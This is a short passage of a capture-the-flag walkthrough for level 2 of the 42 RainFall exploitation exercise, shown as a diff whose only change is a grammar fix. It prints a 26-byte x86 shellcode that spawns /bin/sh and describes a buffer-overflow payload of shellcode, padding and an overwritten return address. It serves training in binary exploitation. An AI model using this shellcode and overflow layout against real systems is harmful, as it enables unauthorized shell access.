maxisimo/42-RainFall/level2/walkthrough.md

 Thanks to internet we'll use some Linux shellcode we found online which will run execve(/bin/sh)
 `\x31\xd2\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x31\xc0\xb0\x0b\x89\xe3\x83\xe4\xf0\xcd\x80`
 Since our shellcode is 26 bytes long we could pad the back with any byte sequence, until 80 bytes then 4 last bytes for the return adress.
-Our final attack buffer will looks like :
+Our final attack buffer will look like :
 - shellcode 			: 26 bytes
 - pad of arbitrary data : 54 bytes
 - return adress			: 4 bytes